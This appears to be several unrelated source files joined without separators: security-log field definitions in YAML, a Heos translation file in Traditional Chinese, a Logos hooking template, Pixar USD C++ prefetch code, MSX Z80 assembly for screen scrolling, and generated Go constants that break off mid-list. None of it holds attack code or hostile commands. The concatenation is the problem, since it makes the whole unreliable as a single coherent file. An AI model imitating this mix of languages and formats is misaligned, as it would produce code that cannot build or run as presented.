- name: zone_dst
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Destination Zone."
- name: gateway
overwrite: true
type: keyword
description: This key is used to capture the IP Address of the gateway
- name: icmp_type
overwrite: true
type: long
description: This key is used to capture the ICMP type only
- name: mask
overwrite: true
type: keyword
description: This key is used to capture the device network IPmask.
- name: icmp_code
overwrite: true
type: long
description: This key is used to capture the ICMP code only
- name: protocol_detail
overwrite: true
type: keyword
description: This key should be used to capture additional protocol information
- name: dmask
overwrite: true
type: keyword
description: This key is used for the Destination Device network mask
- name: port
overwrite: true
type: long
description: This key should only be used to capture a Network Port when the
directionality is not clear
- name: smask
overwrite: true
type: keyword
description: This key is used for capturing source Network Mask
- name: netname
overwrite: true
type: keyword
description: This key is used to capture the network name associated with an
IP range. This is configured by the end user.
- name: paddr
overwrite: true
type: ip
description: Deprecated
- name: faddr
overwrite: true
type: keyword
- name: lhost
overwrite: true
type: keyword
- name: origin
overwrite: true
type: keyword
- name: remote_domain_id
overwrite: true
type: keyword
- name: addr
overwrite: true
type: keyword
- name: dns_a_record
overwrite: true
type: keyword
- name: dns_ptr_record
overwrite: true
type: keyword
- name: fhost
overwrite: true
type: keyword
- name: fport
overwrite: true
type: keyword
- name: laddr
overwrite: true
type: keyword
- name: linterface
overwrite: true
type: keyword
- name: phost
overwrite: true
type: keyword
- name: ad_computer_dst
overwrite: true
type: keyword
description: Deprecated, use host.dst
- name: eth_type
overwrite: true
type: long
description: This key is used to capture Ethernet Type, Used for Layer 3 Protocols
Only
- name: ip_proto
overwrite: true
type: long
description: This key should be used to capture the Protocol number; all the protocol numbers are converted into strings in the UI
- name: dns_cname_record
overwrite: true
type: keyword
- name: dns_id
overwrite: true
type: keyword
- name: dns_opcode
overwrite: true
type: keyword
- name: dns_resp
overwrite: true
type: keyword
- name: dns_type
overwrite: true
type: keyword
- name: domain1
overwrite: true
type: keyword
- name: host_type
overwrite: true
type: keyword
- name: packet_length
overwrite: true
type: keyword
- name: host_orig
overwrite: true
type: keyword
description: This is used to capture the original hostname in case of a Forwarding
Agent or a Proxy in between.
- name: rpayload
overwrite: true
type: keyword
description: This key is used to capture the total number of payload bytes seen
in the retransmitted packets.
- name: vlan_name
overwrite: true
type: keyword
description: This key should only be used to capture the name of the Virtual
LAN
- name: investigations
overwrite: true
type: group
fields:
- name: ec_activity
overwrite: true
type: keyword
description: This key captures the particular event activity (Ex: Logoff)
- name: ec_theme
overwrite: true
type: keyword
description: This key captures the Theme of a particular Event (Ex: Authentication)
- name: ec_subject
overwrite: true
type: keyword
description: This key captures the Subject of a particular Event (Ex: User)
- name: ec_outcome
overwrite: true
type: keyword
description: This key captures the outcome of a particular Event (Ex: Success)
- name: event_cat
overwrite: true
type: long
description: This key captures the Event category number
- name: event_cat_name
overwrite: true
type: keyword
description: This key captures the event category name corresponding to the
event cat code
- name: event_vcat
overwrite: true
type: keyword
description: This is a vendor supplied category. This should be used in situations
where the vendor has adopted their own event_category taxonomy.
- name: analysis_file
overwrite: true
type: keyword
description: This is used to capture all indicators used in a File Analysis.
This key should be used to capture an analysis of a file
- name: analysis_service
overwrite: true
type: keyword
description: This is used to capture all indicators used in a Service Analysis.
This key should be used to capture an analysis of a service
- name: analysis_session
overwrite: true
type: keyword
description: This is used to capture all indicators used for a Session Analysis.
This key should be used to capture an analysis of a session
- name: boc
overwrite: true
type: keyword
description: This is used to capture behaviour of compromise
- name: eoc
overwrite: true
type: keyword
description: This is used to capture Enablers of Compromise
- name: inv_category
overwrite: true
type: keyword
description: This is used to capture the investigation category
- name: inv_context
overwrite: true
type: keyword
description: This is used to capture the investigation context
- name: ioc
overwrite: true
type: keyword
description: This key captures an indicator of compromise
- name: counters
overwrite: true
type: group
fields:
- name: dclass_c1
overwrite: true
type: long
description: This is a generic counter key that should be used with the label
dclass.c1.str only
- name: dclass_c2
overwrite: true
type: long
description: This is a generic counter key that should be used with the label
dclass.c2.str only
- name: event_counter
overwrite: true
type: long
description: This is used to capture the number of times an event repeated
- name: dclass_r1
overwrite: true
type: keyword
description: This is a generic ratio key that should be used with the label
dclass.r1.str only
- name: dclass_c3
overwrite: true
type: long
description: This is a generic counter key that should be used with the label
dclass.c3.str only
- name: dclass_c1_str
overwrite: true
type: keyword
description: This is a generic counter string key that should be used with the
label dclass.c1 only
- name: dclass_c2_str
overwrite: true
type: keyword
description: This is a generic counter string key that should be used with the
label dclass.c2 only
- name: dclass_r1_str
overwrite: true
type: keyword
description: This is a generic ratio string key that should be used with the
label dclass.r1 only
- name: dclass_r2
overwrite: true
type: keyword
description: This is a generic ratio key that should be used with the label
dclass.r2.str only
- name: dclass_c3_str
overwrite: true
type: keyword
description: This is a generic counter string key that should be used with the
label dclass.c3 only
- name: dclass_r3
overwrite: true
type: keyword
description: This is a generic ratio key that should be used with the label
dclass.r3.str only
- name: dclass_r2_str
overwrite: true
type: keyword
description: This is a generic ratio string key that should be used with the
label dclass.r2 only
- name: dclass_r3_str
overwrite: true
type: keyword
description: This is a generic ratio string key that should be used with the
label dclass.r3 only
- name: identity
overwrite: true
type: group
fields:
- name: auth_method
overwrite: true
type: keyword
description: This key is used to capture authentication methods used only
- name: user_role
overwrite: true
type: keyword
description: This key is used to capture the Role of a user only
- name: dn
overwrite: true
type: keyword
description: X.500 (LDAP) Distinguished Name
- name: logon_type
overwrite: true
type: keyword
description: This key is used to capture the type of logon method used.
- name: profile
overwrite: true
type: keyword
description: This key is used to capture the user profile
- name: accesses
overwrite: true
type: keyword
description: This key is used to capture actual privileges used in accessing
an object
- name: realm
overwrite: true
type: keyword
description: Radius realm or similar grouping of accounts
- name: user_sid_dst
overwrite: true
type: keyword
description: This key captures Destination User Session ID
- name: dn_src
overwrite: true
type: keyword
description: An X.500 (LDAP) Distinguished name that is used in a context that
indicates a Source dn
- name: org
overwrite: true
type: keyword
description: This key captures the User organization
- name: dn_dst
overwrite: true
type: keyword
description: An X.500 (LDAP) Distinguished name that is used in a context that indicates a Destination dn
- name: firstname
overwrite: true
type: keyword
description: This key is for First Names only; this is used predominantly in Healthcare to capture Patients' information
- name: lastname
overwrite: true
type: keyword
description: This key is for Last Names only; this is used predominantly in Healthcare to capture Patients' information
- name: user_dept
overwrite: true
type: keyword
description: User's Department Names only
- name: user_sid_src
overwrite: true
type: keyword
description: This key captures Source User Session ID
- name: federated_sp
overwrite: true
type: keyword
description: This key is the Federated Service Provider. This is the application
requesting authentication.
- name: federated_idp
overwrite: true
type: keyword
description: This key is the federated Identity Provider. This is the server
providing the authentication.
- name: logon_type_desc
overwrite: true
type: keyword
description: This key is used to capture the textual description of an integer
logon type as stored in the meta key 'logon.type'.
- name: middlename
overwrite: true
type: keyword
description: This key is for Middle Names only; this is used predominantly in Healthcare to capture Patients' information
- name: password
overwrite: true
type: keyword
description: This key is for Passwords seen in any session, plain text or encrypted
- name: host_role
overwrite: true
type: keyword
description: This key should only be used to capture the role of a Host Machine
- name: ldap
overwrite: true
type: keyword
description: "This key is for Uninterpreted LDAP values. Ldap Values that don\u2019\
t have a clear query or response context"
- name: ldap_query
overwrite: true
type: keyword
description: This key is the Search criteria from an LDAP search
- name: ldap_response
overwrite: true
type: keyword
description: This key is to capture Results from an LDAP search
- name: owner
overwrite: true
type: keyword
description: This is used to capture the username the process or service is running as (the author of the task)
- name: service_account
overwrite: true
type: keyword
description: This key is a windows specific key, used for capturing name of
the account a service (referenced in the event) is running under. Legacy Usage
- name: email
overwrite: true
type: group
fields:
- name: email_dst
overwrite: true
type: keyword
description: This key is used to capture the Destination email address only; when the destination context is not clear, use email
- name: email_src
overwrite: true
type: keyword
description: This key is used to capture the source email address only; when the source context is not clear, use email
- name: subject
overwrite: true
type: keyword
description: This key is used to capture the subject string from an Email only.
- name: email
overwrite: true
type: keyword
description: This key is used to capture a generic email address where the source
or destination context is not clear
- name: trans_from
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: trans_to
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: file
overwrite: true
type: group
fields:
- name: privilege
overwrite: true
type: keyword
description: Deprecated, use permissions
- name: attachment
overwrite: true
type: keyword
description: This key captures the attachment file name
- name: filesystem
overwrite: true
type: keyword
- name: binary
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: filename_dst
overwrite: true
type: keyword
description: This is used to capture name of the file targeted by the action
- name: filename_src
overwrite: true
type: keyword
description: This is used to capture the name of the parent file, the file which performed the action
- name: filename_tmp
overwrite: true
type: keyword
- name: directory_dst
overwrite: true
type: keyword
description: This key is used to capture the directory of the target process or file
- name: directory_src
overwrite: true
type: keyword
description: This key is used to capture the directory of the source process
or file
- name: file_entropy
overwrite: true
type: double
description: This is used to capture the entropy value of a file
- name: file_vendor
overwrite: true
type: keyword
description: This is used to capture Company name of file located in version_info
- name: task_name
overwrite: true
type: keyword
description: This is used to capture name of the task
- name: web
overwrite: true
type: group
fields:
- name: fqdn
overwrite: true
type: keyword
description: Fully Qualified Domain Names
- name: web_cookie
overwrite: true
type: keyword
description: This key is used to capture the Web cookies specifically.
- name: alias_host
overwrite: true
type: keyword
- name: reputation_num
overwrite: true
type: double
description: Reputation Number of an entity. Typically used for Web Domains
- name: web_ref_domain
overwrite: true
type: keyword
description: Web referer's domain
- name: web_ref_query
overwrite: true
type: keyword
description: This key captures Web referer's query portion of the URL
- name: remote_domain
overwrite: true
type: keyword
- name: web_ref_page
overwrite: true
type: keyword
description: This key captures Web referer's page information
- name: web_ref_root
overwrite: true
type: keyword
description: Web referer's root URL path
- name: cn_asn_dst
overwrite: true
type: keyword
- name: cn_rpackets
overwrite: true
type: keyword
- name: urlpage
overwrite: true
type: keyword
- name: urlroot
overwrite: true
type: keyword
- name: p_url
overwrite: true
type: keyword
- name: p_user_agent
overwrite: true
type: keyword
- name: p_web_cookie
overwrite: true
type: keyword
- name: p_web_method
overwrite: true
type: keyword
- name: p_web_referer
overwrite: true
type: keyword
- name: web_extension_tmp
overwrite: true
type: keyword
- name: web_page
overwrite: true
type: keyword
- name: threat
overwrite: true
type: group
fields:
- name: threat_category
overwrite: true
type: keyword
description: This key captures Threat Name/Threat Category/Categorization of
alert
- name: threat_desc
overwrite: true
type: keyword
description: This key is used to capture the threat description from the session
directly or inferred
- name: alert
overwrite: true
type: keyword
description: This key is used to capture name of the alert
- name: threat_source
overwrite: true
type: keyword
description: This key is used to capture source of the threat
- name: crypto
overwrite: true
type: group
fields:
- name: crypto
overwrite: true
type: keyword
description: This key is used to capture the Encryption Type or Encryption Key
only
- name: cipher_src
overwrite: true
type: keyword
description: This key is for Source (Client) Cipher
- name: cert_subject
overwrite: true
type: keyword
description: This key is used to capture the Certificate organization only
- name: peer
overwrite: true
type: keyword
description: This key is for Encryption peer's IP Address
- name: cipher_size_src
overwrite: true
type: long
description: This key captures Source (Client) Cipher Size
- name: ike
overwrite: true
type: keyword
description: IKE negotiation phase.
- name: scheme
overwrite: true
type: keyword
description: This key captures the Encryption scheme used
- name: peer_id
overwrite: true
type: keyword
description: "This key is for Encryption peer\u2019s identity"
- name: sig_type
overwrite: true
type: keyword
description: This key captures the Signature Type
- name: cert_issuer
overwrite: true
type: keyword
- name: cert_host_name
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: cert_error
overwrite: true
type: keyword
description: This key captures the Certificate Error String
- name: cipher_dst
overwrite: true
type: keyword
description: This key is for Destination (Server) Cipher
- name: cipher_size_dst
overwrite: true
type: long
description: This key captures Destination (Server) Cipher Size
- name: ssl_ver_src
overwrite: true
type: keyword
description: Deprecated, use version
- name: d_certauth
overwrite: true
type: keyword
- name: s_certauth
overwrite: true
type: keyword
- name: ike_cookie1
overwrite: true
type: keyword
description: "ID of the negotiation \u2014 sent for ISAKMP Phase One"
- name: ike_cookie2
overwrite: true
type: keyword
description: "ID of the negotiation \u2014 sent for ISAKMP Phase Two"
- name: cert_checksum
overwrite: true
type: keyword
- name: cert_host_cat
overwrite: true
type: keyword
description: This key is used for the hostname category value of a certificate
- name: cert_serial
overwrite: true
type: keyword
description: This key is used to capture the Certificate serial number only
- name: cert_status
overwrite: true
type: keyword
description: This key captures Certificate validation status
- name: ssl_ver_dst
overwrite: true
type: keyword
description: Deprecated, use version
- name: cert_keysize
overwrite: true
type: keyword
- name: cert_username
overwrite: true
type: keyword
- name: https_insact
overwrite: true
type: keyword
- name: https_valid
overwrite: true
type: keyword
- name: cert_ca
overwrite: true
type: keyword
description: This key is used to capture the Certificate signing authority only
- name: cert_common
overwrite: true
type: keyword
description: This key is used to capture the Certificate common name only
- name: wireless
overwrite: true
type: group
fields:
- name: wlan_ssid
overwrite: true
type: keyword
description: This key is used to capture the ssid of a Wireless Session
- name: access_point
overwrite: true
type: keyword
description: This key is used to capture the access point name.
- name: wlan_channel
overwrite: true
type: long
description: This is used to capture the channel names
- name: wlan_name
overwrite: true
type: keyword
description: This key captures either WLAN number/name
- name: storage
overwrite: true
type: group
fields:
- name: disk_volume
overwrite: true
type: keyword
description: A unique name assigned to logical units (volumes) within a physical
disk
- name: lun
overwrite: true
type: keyword
description: Logical Unit Number. This key is a very useful concept in Storage.
- name: pwwn
overwrite: true
type: keyword
description: This uniquely identifies a port on an HBA.
- name: physical
overwrite: true
type: group
fields:
- name: org_dst
overwrite: true
type: keyword
description: This is used to capture the destination organization based on the GeoIP Maxmind database.
- name: org_src
overwrite: true
type: keyword
description: This is used to capture the source organization based on the GeoIP Maxmind database.
- name: healthcare
overwrite: true
type: group
fields:
- name: patient_fname
overwrite: true
type: keyword
description: This key is for First Names only; this is used predominantly in Healthcare to capture Patients' information
- name: patient_id
overwrite: true
type: keyword
description: This key captures the unique ID for a patient
- name: patient_lname
overwrite: true
type: keyword
description: This key is for Last Names only; this is used predominantly in Healthcare to capture Patients' information
- name: patient_mname
overwrite: true
type: keyword
description: This key is for Middle Names only; this is used predominantly in Healthcare to capture Patients' information
- name: endpoint
overwrite: true
type: group
fields:
- name: host_state
overwrite: true
type: keyword
description: This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on
- name: registry_key
overwrite: true
type: keyword
description: This key captures the path to the registry key
- name: registry_value
overwrite: true
type: keyword
description: This key captures values or decorators used within a registry entry
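# Illustrative sketch, assuming a Beats-style fields.yml (hypothetical values,
# not part of the definitions above): nested groups flatten into dotted field
# names under the module's namespace, which is declared earlier in the file
# and is not shown in this excerpt. For example:
#
#   <namespace>.db.table_name: "accounts"
#   <namespace>.network.icmp_type: 8
#   <namespace>.endpoint.registry_key: "HKLM\\Software\\Example"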
{
"config": {
"abort": {
"already_setup": "\u50c5\u80fd\u8a2d\u5b9a\u4e00\u7d44 Heos \u9023\u7dda\uff0c\u5c07\u652f\u63f4\u7db2\u8def\u4e2d\u6240\u6709\u5c0d\u61c9\u8a2d\u5099\u3002"
},
"error": {
"connection_failure": "\u7121\u6cd5\u9023\u7dda\u81f3\u6307\u5b9a\u4e3b\u6a5f\u7aef\u3002"
},
"step": {
"user": {
"data": {
"host": "\u4e3b\u6a5f\u7aef"
},
"description": "\u8acb\u8f38\u5165\u4e3b\u6a5f\u6bb5\u540d\u7a31\u6216 Heos \u8a2d\u5099 IP \u4f4d\u5740\uff08\u5df2\u900f\u904e\u6709\u7dda\u7db2\u8def\u9023\u7dda\uff09\u3002",
"title": "\u9023\u7dda\u81f3 Heos"
}
}
}
}
/* How to Hook with Logos
Hooks are written with syntax similar to that of an Objective-C @implementation.
You don't need to #include <substrate.h>, it will be done automatically, as will
the generation of a class list and an automatic constructor.
%hook ClassName
// Hooking a class method
+ (id)sharedInstance {
return %orig;
}
// Hooking an instance method with an argument.
- (void)messageName:(int)argument {
%log; // Write a message about this call, including its class, name and arguments, to the system log.
%orig; // Call through to the original function with its original arguments.
%orig(nil); // Call through to the original function with a custom argument.
// If you use %orig(), you MUST supply all arguments (except for self and _cmd, the automatically generated ones.)
}
// Hooking an instance method with no arguments.
- (id)noArguments {
%log;
id awesome = %orig;
[awesome doSomethingElse];
return awesome;
}
// Always make sure you clean up after yourself; Not doing so could have grave consequences!
%end
*/
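/* A minimal sketch of a complete hook, assuming a hypothetical target class
   XXExampleClass with an instance method -refresh; substitute a class and
   selector from the binary you are actually patching.

%hook XXExampleClass
- (void)refresh {
    %log;   // trace the call (class, selector, arguments) to the system log
    %orig;  // keep the original behaviour
}
%end
*/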
//
// Copyright 2016 Pixar
//
// Licensed under the Apache License, Version 2.0 (the "Apache License")
// with the following modification; you may not use this file except in
// compliance with the Apache License and the following modification to it:
// Section 6. Trademarks. is deleted and replaced with:
//
// 6. Trademarks. This License does not grant permission to use the trade
// names, trademarks, service marks, or product names of the Licensor
// and its affiliates, except as required to comply with Section 4(c) of
// the License and to reproduce the content of the NOTICE file.
//
// You may obtain a copy of the Apache License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the Apache License with the above modification is
// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the Apache License for the specific
// language governing permissions and limitations under the Apache License.
//
#include "pxr/pxr.h"
#include "pxr/usd/pcp/layerPrefetchRequest.h"
#include "pxr/usd/pcp/layerStackRegistry.h"
#include "pxr/usd/sdf/layerUtils.h"
#include "pxr/base/work/arenaDispatcher.h"
#include "pxr/base/work/threadLimits.h"
#include <tbb/spin_mutex.h>
PXR_NAMESPACE_OPEN_SCOPE
namespace {
struct _Opener
{
explicit _Opener(const Pcp_MutedLayers& mutedLayers,
std::set<SdfLayerRefPtr> *retainedLayers)
: _mutedLayers(mutedLayers)
, _retainedLayers(retainedLayers) {}
~_Opener() { _dispatcher.Wait(); }
void OpenSublayers(const SdfLayerRefPtr &layer,
const SdfLayer::FileFormatArguments &layerArgs) {
TF_FOR_ALL(path, layer->GetSubLayerPaths()) {
_dispatcher.Run(
&_Opener::_OpenSublayer, this, *path, layer, layerArgs);
}
}
private:
void _OpenSublayer(std::string path,
const SdfLayerRefPtr &anchorLayer,
const SdfLayer::FileFormatArguments &layerArgs) {
if (_mutedLayers.IsLayerMuted(anchorLayer, path)) {
return;
}
// Open this specific sublayer path.
// The call to SdfFindOrOpenRelativeToLayer() may take some time,
// potentially multiple seconds.
if (SdfLayerRefPtr sublayer =
SdfFindOrOpenRelativeToLayer(anchorLayer, &path, layerArgs)) {
// Retain this sublayer.
bool didInsert;
{
tbb::spin_mutex::scoped_lock lock(_retainedLayersMutex);
didInsert = _retainedLayers->insert(sublayer).second;
}
// Open the nested sublayers. Only do this if we haven't seen this
// layer before, i.e. didInsert is true.
if (didInsert)
OpenSublayers(sublayer, layerArgs);
}
}
WorkArenaDispatcher _dispatcher;
const Pcp_MutedLayers& _mutedLayers;
std::set<SdfLayerRefPtr> *_retainedLayers;
mutable tbb::spin_mutex _retainedLayersMutex;
};
} // anon
void
PcpLayerPrefetchRequest::RequestSublayerStack(
const SdfLayerRefPtr &layer,
const SdfLayer::FileFormatArguments &args)
{
_sublayerRequests.insert(std::make_pair(layer, args));
}
void
PcpLayerPrefetchRequest::Run(const Pcp_MutedLayers& mutedLayers)
{
if (WorkGetConcurrencyLimit() <= 1) {
// Do not bother pre-fetching if we do not have extra threads
// available.
return;
}
// Release the GIL so we don't deadlock when Sd tries to get a path
// resolver (which does ref-counting on the resolver, which requires
// the GIL to manage TfRefBase identity-uniqueness).
TF_PY_ALLOW_THREADS_IN_SCOPE();
std::set<_Request> requests;
requests.swap(_sublayerRequests);
// Open all the sublayers in the request.
_Opener opener(mutedLayers, &_retainedLayers);
TF_FOR_ALL(req, requests)
opener.OpenSublayers(req->first, req->second);
}
PXR_NAMESPACE_CLOSE_SCOPE
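// ---------------------------------------------------------------------------
// Usage sketch (illustrative only, not part of the original file). It relies
// only on the two public calls defined above plus SdfLayer::FindOrOpen() from
// pxr/usd/sdf/layer.h; passing an empty Pcp_MutedLayers set is an assumption,
// since real callers such as PcpCache supply their own muted-layer registry.
#include "pxr/usd/sdf/layer.h"

PXR_NAMESPACE_USING_DIRECTIVE

void
Pcp_PrefetchSublayersExample(const std::string &rootLayerPath)
{
    SdfLayerRefPtr rootLayer = SdfLayer::FindOrOpen(rootLayerPath);
    if (!rootLayer) {
        return;
    }

    PcpLayerPrefetchRequest request;
    // Queue the root layer's sublayer stack for prefetching...
    request.RequestSublayerStack(rootLayer, SdfLayer::FileFormatArguments());

    // ...then open all nested sublayers on worker threads. With a concurrency
    // limit of 1 this is a no-op, as Run() checks above.
    Pcp_MutedLayers mutedLayers;  // assumption: default-constructed, empty
    request.Run(mutedLayers);
}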
;
; ANSI Video handling for the MSX
;
; Handles colors
;
; Scrollup
;
; Stefano Bodrato - Sept. 2017
;
; $Id: f_ansi_scrollup_nobios.asm $
;
SECTION code_clib
PUBLIC ansi_SCROLLUP
PUBLIC __tms9918_scroll_buffer
EXTERN __tms9918_attribute
EXTERN LDIRVM
EXTERN LDIRMV
EXTERN FILVRM
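;
; What the routine below does: rows 1..23 of the display are copied one
; character row (256 bytes) upwards through __tms9918_scroll_buffer, first in
; the pattern table (VRAM address in HL) and then in the table 8192 bytes
; above it (the TMS9918 colour table, judging from the +8192 offset), after
; which the freed bottom row of the pattern table is blanked with FILVRM.
;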
.ansi_SCROLLUP
push ix
ld b,23
ld hl,256
.scloop
push bc
push hl
ld de,__tms9918_scroll_buffer
ld bc,256
call LDIRMV
pop hl
push hl
ld de,-256
add hl,de
ld de,__tms9918_scroll_buffer
ld bc,256
ex de,hl
call LDIRVM
pop hl
push hl
ld de,8192
add hl,de
push hl
ld de,__tms9918_scroll_buffer
ld bc,256
call LDIRMV
pop hl
ld de,-256
add hl,de
ld de,__tms9918_scroll_buffer
ld bc,256
ex de,hl
call LDIRVM
pop hl
inc h
pop bc
djnz scloop
dec h
xor a
ld bc,256
call FILVRM
pop ix
ret
SECTION bss_clib
.__tms9918_scroll_buffer defs 256
// mkerrors.sh -Wall -Werror -static -I/tmp/include -m64
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build amd64,linux
// Created by cgo -godefs - DO NOT EDIT
// cgo -godefs -- -Wall -Werror -static -I/tmp/include -m64 _const.go
package unix
import "syscall"
const (
AF_ALG = 0x26
AF_APPLETALK = 0x5
AF_ASH = 0x12
AF_ATMPVC = 0x8
AF_ATMSVC = 0x14
AF_AX25 = 0x3
AF_BLUETOOTH = 0x1f
AF_BRIDGE = 0x7
AF_CAIF = 0x25
AF_CAN = 0x1d
AF_DECnet = 0xc
AF_ECONET = 0x13
AF_FILE = 0x1
AF_IB = 0x1b
AF_IEEE802154 = 0x24
AF_INET = 0x2
AF_INET6 = 0xa
AF_IPX = 0x4
AF_IRDA = 0x17
AF_ISDN = 0x22
AF_IUCV = 0x20
AF_KCM = 0x29
AF_KEY = 0xf
AF_LLC = 0x1a
AF_LOCAL = 0x1
AF_MAX = 0x2c
AF_MPLS = 0x1c
AF_NETBEUI = 0xd
AF_NETLINK = 0x10
AF_NETROM = 0x6
AF_NFC = 0x27
AF_PACKET = 0x11
AF_PHONET = 0x23
AF_PPPOX = 0x18
AF_QIPCRTR = 0x2a
AF_RDS = 0x15
AF_ROSE = 0xb
AF_ROUTE = 0x10
AF_RXRPC = 0x21
AF_SECURITY = 0xe
AF_SMC = 0x2b
AF_SNA = 0x16
AF_TIPC = 0x1e
AF_UNIX = 0x1
AF_UNSPEC = 0x0
AF_VSOCK = 0x28
AF_WANPIPE = 0x19
AF_X25 = 0x9
ALG_OP_DECRYPT = 0x0
ALG_OP_ENCRYPT = 0x1
ALG_SET_AEAD_ASSOCLEN = 0x4
ALG_SET_AEAD_AUTHSIZE = 0x5
ALG_SET_IV = 0x2
ALG_SET_KEY = 0x1
ALG_SET_OP = 0x3
ARPHRD_6LOWPAN = 0x339
ARPHRD_ADAPT = 0x108
ARPHRD_APPLETLK = 0x8
ARPHRD_ARCNET = 0x7
ARPHRD_ASH = 0x30d
ARPHRD_ATM = 0x13
ARPHRD_AX25 = 0x3
ARPHRD_BIF = 0x307
ARPHRD_CAIF = 0x336
ARPHRD_CAN = 0x118
ARPHRD_CHAOS = 0x5
ARPHRD_CISCO = 0x201
ARPHRD_CSLIP = 0x101
ARPHRD_CSLIP6 = 0x103
ARPHRD_DDCMP = 0x205
ARPHRD_DLCI = 0xf
ARPHRD_ECONET = 0x30e
ARPHRD_EETHER = 0x2
ARPHRD_ETHER = 0x1
ARPHRD_EUI64 = 0x1b
ARPHRD_FCAL = 0x311
ARPHRD_FCFABRIC = 0x313
ARPHRD_FCPL = 0x312
ARPHRD_FCPP = 0x310
ARPHRD_FDDI = 0x306
ARPHRD_FRAD = 0x302
ARPHRD_HDLC = 0x201
ARPHRD_HIPPI = 0x30c
ARPHRD_HWX25 = 0x110
ARPHRD_IEEE1394 = 0x18
ARPHRD_IEEE802 = 0x6
ARPHRD_IEEE80211 = 0x321
ARPHRD_IEEE80211_PRISM = 0x322
ARPHRD_IEEE80211_RADIOTAP = 0x323
ARPHRD_IEEE802154 = 0x324
ARPHRD_IEEE802154_MONITOR = 0x325
ARPHRD_IEEE802_TR = 0x320
ARPHRD_INFINIBAND = 0x20
ARPHRD_IP6GRE = 0x337
ARPHRD_IPDDP = 0x309
ARPHRD_IPGRE = 0x30a
ARPHRD_IRDA = 0x30f
ARPHRD_LAPB = 0x204
ARPHRD_LOCALTLK = 0x305
ARPHRD_LOOPBACK = 0x304
ARPHRD_METRICOM = 0x17
ARPHRD_NETLINK = 0x338
ARPHRD_NETROM = 0x0
ARPHRD_NONE = 0xfffe
ARPHRD_PHONET = 0x334
ARPHRD_PHONET_PIPE = 0x335
ARPHRD_PIMREG = 0x30b
ARPHRD_PPP = 0x200
ARPHRD_PRONET = 0x4
ARPHRD_RAWHDLC = 0x206
ARPHRD_ROSE = 0x10e
ARPHRD_RSRVD = 0x104
ARPHRD_SIT = 0x308
ARPHRD_SKIP = 0x303
ARPHRD_SLIP = 0x100
ARPHRD_SLIP6 = 0x102
ARPHRD_TUNNEL = 0x300
ARPHRD_TUNNEL6 = 0x301
ARPHRD_VOID = 0xffff
ARPHRD_VSOCKMON = 0x33a
ARPHRD_X25 = 0x10f
B0 = 0x0
B1000000 = 0x1008
B110 = 0x3
B115200 = 0x1002
B1152000 = 0x1009
B1200 = 0x9
B134 = 0x4
B150 = 0x5
B1500000 = 0x100a
B1800 = 0xa
B19200 = 0xe
B200 = 0x6
B2000000 = 0x100b
B230400 = 0x1003
B2400 = 0xb
B2500000 = 0x100c
B300 = 0x7
B3000000 = 0x100d
B3500000 = 0x100e
B38400 = 0xf
B4000000 = 0x100f
B460800 = 0x1004
B4800 = 0xc
B50 = 0x1
B500000 = 0x1005
B57600 = 0x1001
B576000 = 0x1006
B600 = 0x8
B75 = 0x2
B921600 = 0x1007
B9600 = 0xd
BLKBSZGET = 0x80081270
BLKBSZSET = 0x40081271
BLKFLSBUF = 0x1261
BLKFRAGET = 0x1265
BLKFRASET = 0x1264
BLKGETSIZE = 0x1260
BLKGETSIZE64 = 0x80081272
BLKPBSZGET = 0x127b
BLKRAGET = 0x1263
BLKRASET = 0x1262
BLKROGET = 0x125e
BLKROSET = 0x125d
BLKRRPART = 0x125f
BLKSECTGET = 0x1267
BLKSECTSET = 0x1266
BLKSSZGET = 0x1268
BOTHER = 0x1000
BPF_A = 0x10
BPF_ABS = 0x20
BPF_ADD = 0x0
BPF_ALU = 0x4
BPF_AND = 0x50
BPF_B = 0x10
BPF_DIV = 0x30
BPF_H = 0x8
BPF_IMM = 0x0
BPF_IND = 0x40
BPF_JA = 0x0
BPF_JEQ = 0x10
BPF_JGE = 0x30
BPF_JGT = 0x20
BPF_JMP = 0x5
BPF_JSET = 0x40
BPF_K = 0x0
BPF_LD = 0x0
BPF_LDX = 0x1
BPF_LEN = 0x80
BPF_LL_OFF = -0x200000
BPF_LSH = 0x60
BPF_MAJOR_VERSION = 0x1
BPF_MAXINSNS = 0x1000
BPF_MEM = 0x60
BPF_MEMWORDS = 0x10
BPF_MINOR_VERSION = 0x1
BPF_MISC = 0x7
BPF_MOD = 0x90
BPF_MSH = 0xa0
BPF_MUL = 0x20
BPF_NEG = 0x80
BPF_NET_OFF = -0x100000
BPF_OR = 0x40
BPF_RET = 0x6
BPF_RSH = 0x70
BPF_ST = 0x2
BPF_STX = 0x3
BPF_SUB = 0x10
BPF_TAX = 0x0
BPF_TXA = 0x80
BPF_W = 0x0
BPF_X = 0x8
BPF_XOR = 0xa0
BRKINT = 0x2
BS0 = 0x0
BS1 = 0x2000
BSDLY = 0x2000
CAN_BCM = 0x2
CAN_EFF_FLAG = 0x80000000
CAN_EFF_ID_BITS = 0x1d
CAN_EFF_MASK = 0x1fffffff
CAN_ERR_FLAG = 0x20000000
CAN_ERR_MASK = 0x1fffffff
CAN_INV_FILTER = 0x20000000
CAN_ISOTP = 0x6
CAN_MAX_DLC = 0x8
CAN_MAX_DLEN = 0x8
CAN_MCNET = 0x5
CAN_MTU = 0x10
CAN_NPROTO = 0x7
CAN_RAW = 0x1
CAN_RAW_FILTER_MAX = 0x200
CAN_RTR_FLAG = 0x40000000
CAN_SFF_ID_BITS = 0xb
CAN_SFF_MASK = 0x7ff
CAN_TP16 = 0x3
CAN_TP20 = 0x4
CBAUD = 0x100f
CBAUDEX = 0x1000
CFLUSH = 0xf
CIBAUD = 0x100f0000
CLOCAL = 0x800
CLOCK_BOOTTIME = 0x7
CLOCK_BOOTTIME_ALARM = 0x9
CLOCK_DEFAULT = 0x0
CLOCK_EXT = 0x1
CLOCK_INT = 0x2
CLOCK_MONOTONIC = 0x1
CLOCK_MONOTONIC_COARSE = 0x6
CLOCK_MONOTONIC_RAW = 0x4
CLOCK_PROCESS_CPUTIME_ID = 0x2
CLOCK_REALTIME = 0x0
